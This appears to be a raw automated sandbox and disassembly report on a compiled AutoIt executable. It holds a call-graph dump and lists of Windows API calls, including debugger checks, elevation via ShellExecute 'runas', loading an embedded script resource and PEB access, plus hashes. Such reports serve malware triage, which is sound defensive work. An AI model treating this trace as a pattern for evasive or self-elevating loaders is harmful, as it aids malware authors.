103161->103162 103163 383377 DecodePointer EncodePointer 103162->103163 103226 389d75 LeaveCriticalSection 103163->103226 103165 364849 103166 3833d4 103165->103166 103167 3833f8 103166->103167 103168 3833de 103166->103168 103167->103100 103168->103167 103227 388b28 58 API calls __getptd_noexit 103168->103227 103170 3833e8 103228 388db6 9 API calls __wctomb_s_l 103170->103228 103172 3833f3 103172->103100 103173->103102 103175 363b47 __ftell_nolock 103174->103175 103176 367667 59 API calls 103175->103176 103177 363b51 GetCurrentDirectoryW 103176->103177 103229 363766 103177->103229 103179 363b7a IsDebuggerPresent 103180 39d272 MessageBoxA 103179->103180 103181 363b88 103179->103181 103182 39d28c 103180->103182 103181->103182 103183 363ba5 103181->103183 103216 363c61 103181->103216 103351 367213 59 API calls Mailbox 103182->103351 103310 367285 103183->103310 103184 363c68 SetCurrentDirectoryW 103187 363c75 Mailbox 103184->103187 103187->103104 103188 39d29c 103193 39d2b2 SetCurrentDirectoryW 103188->103193 103193->103187 103216->103184 103226->103165 103227->103170 103228->103172 103230 367667 59 API calls 103229->103230 103231 36377c 103230->103231 103353 363d31 103231->103353 103233 36379a 103234 364706 61 API calls 103233->103234 103235 3637ae 103234->103235 103236 367de1 59 API calls 103235->103236 103237 3637bb 103236->103237 103238 364ddd 136 API calls 103237->103238 103239 3637d4 103238->103239 103240 39d173 103239->103240 103241 3637dc Mailbox 103239->103241 103395 3c955b 103240->103395 103245 368047 59 API calls 103241->103245 103244 39d192 103247 382d55 _free 58 API calls 103244->103247 103248 3637ef 103245->103248 103246 364e4a 84 API calls 103246->103244 103249 39d19f 103247->103249 103367 36928a 103248->103367 103251 364e4a 84 API calls 103249->103251 103253 39d1a8 103251->103253 103257 363ed0 59 API calls 103253->103257 103254 367de1 59 API calls 103255 363808 103254->103255 103256 3684c0 69 API calls 103255->103256 103258 36381a Mailbox 103256->103258 103259 39d1c3 103257->103259 103260 367de1 59 API calls 103258->103260 103261 363ed0 59 API calls 103259->103261 103262 363840 103260->103262 103263 39d1df 103261->103263 103264 3684c0 69 API calls 103262->103264 103265 364706 61 API calls 103263->103265 103267 36384f Mailbox 103264->103267 103266 39d204 103265->103266 103268 363ed0 59 API calls 103266->103268 103270 367667 59 API calls 103267->103270 103269 39d210 103268->103269 103271 368047 59 API calls 103269->103271 103272 36386d 103270->103272 103273 39d21e 103271->103273 103370 363ed0 103272->103370 103276 363ed0 59 API calls 103273->103276 103277 39d22d 103276->103277 103283 368047 59 API calls 103277->103283 103279 363887 103279->103253 103280 363891 103279->103280 103281 382efd _W_store_winword 60 API calls 103280->103281 103282 36389c 103281->103282 103282->103259 103284 3638a6 103282->103284 103285 39d24f 103283->103285 103286 382efd _W_store_winword 60 API calls 103284->103286 103287 363ed0 59 API calls 103285->103287 103288 3638b1 103286->103288 103289 39d25c 103287->103289 103288->103263 103290 3638bb 103288->103290 103289->103289 103291 382efd _W_store_winword 60 API calls 103290->103291 103292 3638c6 103291->103292 103292->103277 103293 363907 103292->103293 103295 363ed0 59 API calls 103292->103295 103293->103277 103294 363914 103293->103294 103296 3692ce 59 API calls 103294->103296 103297 3638ea 103295->103297 103299 363924 103296->103299 103298 368047 59 API calls 103297->103298 103300 3638f8 103298->103300 103301 369050 59 API calls 103299->103301 103302 363ed0 59 API calls 103300->103302 103303 363932 103301->103303 103302->103293 103386 368ee0 103303->103386 103305 36928a 59 API calls 103306 36394f 103305->103306 103306->103305 103307 368ee0 60 API calls 103306->103307 103308 363995 Mailbox 103306->103308 103309 363ed0 59 API calls 103306->103309 103307->103306 103308->103179 103309->103306 103311 367292 __ftell_nolock 103310->103311 103312 39ea22 _memset 103311->103312 103313 3672ab 103311->103313 103316 39ea3e GetOpenFileNameW 103312->103316 103314 364750 60 API calls 103313->103314 103315 3672b4 103314->103315 103435 380791 103315->103435 103318 39ea8d 103316->103318 103320 367bcc 59 API calls 103318->103320 103322 39eaa2 103320->103322 103322->103322 103323 3672c9 103453 36686a 103323->103453 103351->103188 103354 363d3e __ftell_nolock 103353->103354 103355 367bcc 59 API calls 103354->103355 103360 363ea4 Mailbox 103354->103360 103357 363d70 103355->103357 103356 3679f2 59 API calls 103356->103357 103357->103356 103365 363da6 Mailbox 103357->103365 103358 363e77 103359 367de1 59 API calls 103358->103359 103358->103360 103362 363e98 103359->103362 103360->103233 103361 367de1 59 API calls 103361->103365 103363 363f74 59 API calls 103362->103363 103363->103360 103364 363f74 59 API calls 103364->103365 103365->103358 103365->103360 103365->103361 103365->103364 103366 3679f2 59 API calls 103365->103366 103366->103365 103368 380db6 Mailbox 59 API calls 103367->103368 103369 3637fb 103368->103369 103369->103254 103371 363ef3 103370->103371 103372 363eda 103370->103372 103374 367bcc 59 API calls 103371->103374 103373 368047 59 API calls 103372->103373 103375 363879 103373->103375 103374->103375 103376 382efd 103375->103376 103377 382f09 103376->103377 103378 382f7e 103376->103378 103385 382f2e 103377->103385 103430 388b28 58 API calls __getptd_noexit 103377->103430 103432 382f90 60 API calls 3 library calls 103378->103432 103381 382f8b 103381->103279 103382 382f15 103431 388db6 9 API calls __wctomb_s_l 103382->103431 103384 382f20 103384->103279 103385->103279 103387 39f17c 103386->103387 103393 368ef7 103386->103393 103387->103393 103433 368bdb 59 API calls Mailbox 103387->103433 103389 369040 103392 369d3c 60 API calls 103389->103392 103390 368ff8 103391 380db6 Mailbox 59 API calls 103390->103391 103394 368fff 103391->103394 103392->103394 103393->103389 103393->103390 103393->103394 103394->103306 103396 364ee5 85 API calls 103395->103396 103397 3c95ca 103396->103397 103398 3c9734 96 API calls 103397->103398 103399 3c95dc 103398->103399 103400 364f0b 74 API calls 103399->103400 103427 39d186 103399->103427 103401 3c95f7 103400->103401 103402 364f0b 74 API calls 103401->103402 103403 3c9607 103402->103403 103404 364f0b 74 API calls 103403->103404 103405 3c9622 103404->103405 103406 364f0b 74 API calls 103405->103406 103407 3c963d 103406->103407 103408 364ee5 85 API calls 103407->103408 103409 3c9654 103408->103409 103410 38571c _W_store_winword 58 API calls 103409->103410 103411 3c965b 103410->103411 103412 38571c _W_store_winword 58 API calls 103411->103412 103413 3c9665 103412->103413 103414 364f0b 74 API calls 103413->103414 103415 3c9679 103414->103415 103416 3c9109 GetSystemTimeAsFileTime 103415->103416 103417 3c968c 103416->103417 103418 3c96b6 103417->103418 103419 3c96a1 103417->103419 103420 3c96bc 103418->103420 103421 3c971b 103418->103421 103422 382d55 _free 58 API calls 103419->103422 103434 3c8b06 116 API calls __fcloseall 103420->103434 103424 382d55 _free 58 API calls 103421->103424 103425 3c96a7 103422->103425 103424->103427 103428 382d55 _free 58 API calls 103425->103428 103426 3c9713 103429 382d55 _free 58 API calls 103426->103429 103427->103244 103427->103246 103428->103427 103429->103427 103430->103382 103431->103384 103432->103381 103433->103393 103434->103426 103436 38079e __ftell_nolock 103435->103436 103437 38079f GetLongPathNameW 103436->103437 103438 367bcc 59 API calls 103437->103438 103439 3672bd 103438->103439 103440 36700b 103439->103440 103441 367667 59 API calls 103440->103441 103442 36701d 103441->103442 103443 364750 60 API calls 103442->103443 103444 367028 103443->103444 103445 367033 103444->103445 103446 39e885 103444->103446 103447 363f74 59 API calls 103445->103447 103451 39e89f 103446->103451 103493 367908 61 API calls 103446->103493 103449 36703f 103447->103449 103487 3634c2 103449->103487 103452 367052 Mailbox 103452->103323 103454 364ddd 136 API calls 103453->103454 103455 36688f 103454->103455 103456 39e031 103455->103456 103458 364ddd 136 API calls 103455->103458 103457 3c955b 122 API calls 103456->103457 103459 39e046 103457->103459 103460 3668a3 103458->103460 103461 39e04a 103459->103461 103462 39e067 103459->103462 103460->103456 103463 3668ab 103460->103463 103464 364e4a 84 API calls 103461->103464 103465 380db6 Mailbox 59 API calls 103462->103465 103466 3668b7 103463->103466 103467 39e052 103463->103467 103464->103467 103486 39e0ac Mailbox 103465->103486 103494 366a8c 103466->103494 103587 3c42f8 91 API calls _wprintf 103467->103587 103470 39e060 103470->103462 103472 39e260 103473 382d55 _free 58 API calls 103472->103473 103479 382d55 _free 58 API calls 103480 39e271 103479->103480 103480->103479 103482 364e4a 84 API calls 103480->103482 103482->103480 103483 367de1 59 API calls 103483->103486 103486->103472 103486->103480 103486->103483 103588 3bf73d 59 API calls 2 library calls 103486->103588 103589 3bf65e 61 API calls 2 library calls 103486->103589 103590 3c737f 59 API calls Mailbox 103486->103590 103591 36750f 59 API calls 2 library calls 103486->103591 103592 36735d 59 API calls Mailbox 103486->103592 103488 3634d4 103487->103488 103492 3634f3 _memmove 103487->103492 103490 380db6 Mailbox 59 API calls 103488->103490 103489 380db6 Mailbox 59 API calls 103491 36350a 103489->103491 103490->103492 103491->103452 103492->103489 103493->103446 103495 366ab5 103494->103495 103496 39e41e 103494->103496 103599 3657a6 60 API calls Mailbox 103495->103599 103615 3bf7a1 90 API calls 4 library calls 103496->103615 103587->103470 103588->103486 103589->103486 103590->103486 103591->103486 103592->103486 103647 e78878 103661 e764c8 103647->103661 103649 e78946 103664 e78768 103649->103664 103667 e79978 GetPEB 103661->103667 103663 e76b53 103663->103649 103665 e78771 Sleep 103664->103665 103666 e7877f 103665->103666 103668 e799a2 103667->103668 103668->103663

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00363B68
                                                          • IsDebuggerPresent.KERNEL32 ref: 00363B7A
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,004252F8,004252E0,?,?), ref: 00363BEB
                                                            • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • Part of subcall function 0037092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00363C14,004252F8,?,?,?), ref: 0037096E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00363C6F
                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00417770,00000010), ref: 0039D281
                                                          • SetCurrentDirectoryW.KERNEL32(?,004252F8,?,?,?), ref: 0039D2B9
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00414260,004252F8,?,?,?), ref: 0039D33F
                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 0039D346
                                                            • Part of subcall function 00363A46: GetSysColorBrush.USER32(0000000F), ref: 00363A50
                                                            • Part of subcall function 00363A46: LoadCursorW.USER32(00000000,00007F00), ref: 00363A5F
                                                            • Part of subcall function 00363A46: LoadIconW.USER32(00000063), ref: 00363A76
                                                            • Part of subcall function 00363A46: LoadIconW.USER32(000000A4), ref: 00363A88
                                                            • Part of subcall function 00363A46: LoadIconW.USER32(000000A2), ref: 00363A9A
                                                            • Part of subcall function 00363A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00363AC0
                                                            • Part of subcall function 00363A46: RegisterClassExW.USER32(?), ref: 00363B16
                                                            • Part of subcall function 003639D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00363A03
                                                            • Part of subcall function 003639D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00363A24
                                                            • Part of subcall function 003639D5: ShowWindow.USER32(00000000,?,?), ref: 00363A38
                                                            • Part of subcall function 003639D5: ShowWindow.USER32(00000000,?,?), ref: 00363A41
                                                            • Part of subcall function 0036434A: _memset.LIBCMT ref: 00364370
                                                            • Part of subcall function 0036434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00364415
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                          • String ID: This is a third-party compiled AutoIt script.$runas$%?
                                                          • API String ID: 529118366-505933256
                                                          • Opcode ID: 964ed0258bf669d27132c26e2bcea4c9b22323f0dd5e5bca200027297c424831
                                                          • Instruction ID: 84c90862d69b1908313bcc720b2043c86ee5caf731bdb4c51ecfe2706ff1c8f0
                                                          • Opcode Fuzzy Hash: 964ed0258bf669d27132c26e2bcea4c9b22323f0dd5e5bca200027297c424831
                                                          • Instruction Fuzzy Hash: B5510730A08148EECF23EBB4EC46AFD7B78AB45300F90C1A5F451AA1E5CBB45642CB34

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1037 3649a0-364a00 call 367667 GetVersionExW call 367bcc 1042 364a06 1037->1042 1043 364b0b-364b0d 1037->1043 1045 364a09-364a0e 1042->1045 1044 39d767-39d773 1043->1044 1046 39d774-39d778 1044->1046 1047 364a14 1045->1047 1048 364b12-364b13 1045->1048 1050 39d77b-39d787 1046->1050 1051 39d77a 1046->1051 1049 364a15-364a4c call 367d2c call 367726 1047->1049 1048->1049 1059 364a52-364a53 1049->1059 1060 39d864-39d867 1049->1060 1050->1046 1053 39d789-39d78e 1050->1053 1051->1050 1053->1045 1055 39d794-39d79b 1053->1055 1055->1044 1057 39d79d 1055->1057 1061 39d7a2-39d7a5 1057->1061 1059->1061 1062 364a59-364a64 1059->1062 1063 39d869 1060->1063 1064 39d880-39d884 1060->1064 1065 39d7ab-39d7c9 1061->1065 1066 364a93-364aaa GetCurrentProcess IsWow64Process 1061->1066 1067 39d7ea-39d7f0 1062->1067 1068 364a6a-364a6c 1062->1068 1069 39d86c 1063->1069 1071 39d86f-39d878 1064->1071 1072 39d886-39d88f 1064->1072 1065->1066 1070 39d7cf-39d7d5 1065->1070 1073 364aaf-364ac0 1066->1073 1074 364aac 1066->1074 1079 39d7fa-39d800 1067->1079 1080 39d7f2-39d7f5 1067->1080 1075 364a72-364a75 1068->1075 1076 39d805-39d811 1068->1076 1069->1071 1077 39d7df-39d7e5 1070->1077 1078 39d7d7-39d7da 1070->1078 1071->1064 1072->1069 1081 39d891-39d894 1072->1081 1082 364ac2-364ad2 call 364b37 1073->1082 1083 364b2b-364b35 GetSystemInfo 1073->1083 1074->1073 1084 39d831-39d834 1075->1084 1085 364a7b-364a8a 1075->1085 1087 39d81b-39d821 1076->1087 1088 39d813-39d816 1076->1088 1077->1066 1078->1066 1079->1066 1080->1066 1081->1071 1094 364ad4-364ae1 call 364b37 1082->1094 1095 364b1f-364b29 GetSystemInfo 1082->1095 1086 364af8-364b08 1083->1086 1084->1066 1093 39d83a-39d84f 1084->1093 1090 364a90 1085->1090 1091 39d826-39d82c 1085->1091 1087->1066 1088->1066 1090->1066 1091->1066 1096 39d859-39d85f 1093->1096 1097 39d851-39d854 1093->1097 1102 364ae3-364ae7 GetNativeSystemInfo 1094->1102 1103 364b18-364b1d 1094->1103 1098 364ae9-364aed 1095->1098 1096->1066 1097->1066 1098->1086 1101 364aef-364af2 FreeLibrary 1098->1101 1101->1086 1102->1098 1103->1102
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 003649CD
                                                            • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                          • GetCurrentProcess.KERNEL32(?,003EFAEC,00000000,00000000,?), ref: 00364A9A
                                                          • IsWow64Process.KERNEL32(00000000), ref: 00364AA1
                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00364AE7
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00364AF2
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00364B23
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00364B2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                          • String ID:
                                                          • API String ID: 1986165174-0
                                                          • Opcode ID: 0e55340853a1fd778bb37495be33eba950969f65477e9539c70b63723ec7689c
                                                          • Instruction ID: f70a066286bf5b8991631b3e79af4961e3aaf7cfa638d73ce7166b51439a9d26
                                                          • Opcode Fuzzy Hash: 0e55340853a1fd778bb37495be33eba950969f65477e9539c70b63723ec7689c
                                                          • Instruction Fuzzy Hash: BD91C63198D7C4DECB33DBA8C5511AAFFF5AF2A300B448AADD0CB97A45D220E548C759

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1104 364e89-364ea1 CreateStreamOnHGlobal 1105 364ea3-364eba FindResourceExW 1104->1105 1106 364ec1-364ec6 1104->1106 1107 364ec0 1105->1107 1108 39d933-39d942 LoadResource 1105->1108 1107->1106 1108->1107 1109 39d948-39d956 SizeofResource 1108->1109 1109->1107 1110 39d95c-39d967 LockResource 1109->1110 1110->1107 1111 39d96d-39d975 1110->1111 1112 39d979-39d98b 1111->1112 1112->1107
                                                          APIs
                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00364D8E,?,?,00000000,00000000), ref: 00364E99
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00364D8E,?,?,00000000,00000000), ref: 00364EB0
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F), ref: 0039D937
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F), ref: 0039D94C
                                                          • LockResource.KERNEL32(00364D8E,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F,00000000), ref: 0039D95F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: 5b294fb96a21861bea3ffca30c2a32277d80edf9c0433ad420f7309238a43f3d
                                                          • Instruction ID: 49d91c74f0c587d362949b36e1b0b018ed2ebd59c3986e4b33397a42596ecd6f
                                                          • Opcode Fuzzy Hash: 5b294fb96a21861bea3ffca30c2a32277d80edf9c0433ad420f7309238a43f3d
                                                          • Instruction Fuzzy Hash: 37115175640741BFD7228B65EC48F677BBDFBC6711F108668F5159A190DBA1EC008660
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: pbB$%?
                                                          • API String ID: 3964851224-3075198358
                                                          • Opcode ID: 7e75c99aa72eadd02bdb2eb20a64936542a142f34c7f5cee52a82994b9d394aa
                                                          • Instruction ID: 5b63de59d6533bafd43b3b7282b03c8ca80ff3849b0f20d53225f72840a14503
                                                          • Opcode Fuzzy Hash: 7e75c99aa72eadd02bdb2eb20a64936542a142f34c7f5cee52a82994b9d394aa
                                                          • Instruction Fuzzy Hash: 73927874608341CFD726DF24C480B2AB7E4FF89304F15896DE89A9B262D775EC45CB92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DdB$DdB$DdB$DdB$Variable must be of type 'Object'.
                                                          • API String ID: 0-4073077587
                                                          • Opcode ID: 1f2c7e90e4c56aa22d1d92ea01cf72bd6abfe232c097f99e3ec7c86cab36013c
                                                          • Instruction ID: 324cfab5ffee2a3f24db67aa02fc8c37d1779d7524ce526840952430082b1250
                                                          • Opcode Fuzzy Hash: 1f2c7e90e4c56aa22d1d92ea01cf72bd6abfe232c097f99e3ec7c86cab36013c
                                                          • Instruction Fuzzy Hash: 3CA2C178A00215CFCB26CF98C480AAEB7B5FF59310F65C069E805AB359D775ED4ACB90
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00364834
                                                            • Part of subcall function 0038336C: __lock.LIBCMT ref: 00383372
                                                            • Part of subcall function 0038336C: DecodePointer.KERNEL32(00000001,?,00364849,003B7C74), ref: 0038337E
                                                            • Part of subcall function 0038336C: EncodePointer.KERNEL32(?,?,00364849,003B7C74), ref: 00383389
                                                            • Part of subcall function 003648FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00364915
                                                            • Part of subcall function 003648FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0036492A
                                                            • Part of subcall function 00363B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00363B68
                                                            • Part of subcall function 00363B3A: IsDebuggerPresent.KERNEL32 ref: 00363B7A
                                                            • Part of subcall function 00363B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004252F8,004252E0,?,?), ref: 00363BEB
                                                            • Part of subcall function 00363B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00363C6F
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00364874
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                          • String ID: 8]
                                                          • API String ID: 1438897964-438778366
                                                          • Opcode ID: a3ac00fff01ca316bcc29c4708e9ff73ad8aa5bdfaa4624fb4ddface27b7cf64
                                                          • Instruction ID: 37539c4cc2624dfb2c6dbd2fc15eeffed4c46528cedee32ec6ea63b875383793
                                                          • Opcode Fuzzy Hash: a3ac00fff01ca316bcc29c4708e9ff73ad8aa5bdfaa4624fb4ddface27b7cf64
                                                          • Instruction Fuzzy Hash: 5A118C71A08341DFD711EF28DC4591ABBE8EB85750F50856EF0808B2B1DBB09646CB96
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,0039E398), ref: 003C446A
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 003C447B
                                                          • FindClose.KERNEL32(00000000), ref: 003C448B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: e24e9fd7f7d2c90a20565f91a74e2ace94db03e9a983ab80c05e88bd6d497b18
                                                          • Instruction ID: 260b61b3aa551640694d1690b2e11948ab01f506d4f047667f99b47802ec9c9e
                                                          • Opcode Fuzzy Hash: e24e9fd7f7d2c90a20565f91a74e2ace94db03e9a983ab80c05e88bd6d497b18
                                                          • Instruction Fuzzy Hash: BAE0D8378145406B82256B38EC4DAE9775C9F05335F204B19F935C50D0E7B49D009695
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00370A5B
                                                          • timeGetTime.WINMM ref: 00370D16
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00370E53
                                                          • Sleep.KERNEL32(0000000A), ref: 00370E61
                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00370EFA
                                                          • DestroyWindow.USER32 ref: 00370F06
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00370F20
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 003A4E83
                                                          • TranslateMessage.USER32(?), ref: 003A5C60
                                                          • DispatchMessageW.USER32(?), ref: 003A5C6E
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003A5C82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbB$pbB$pbB$pbB
                                                          • API String ID: 4212290369-707248984
                                                          • Opcode ID: b11cd91aebe7ce64f27b304e8c2a7fa6f62be64bb836472c43b77f71018249a8
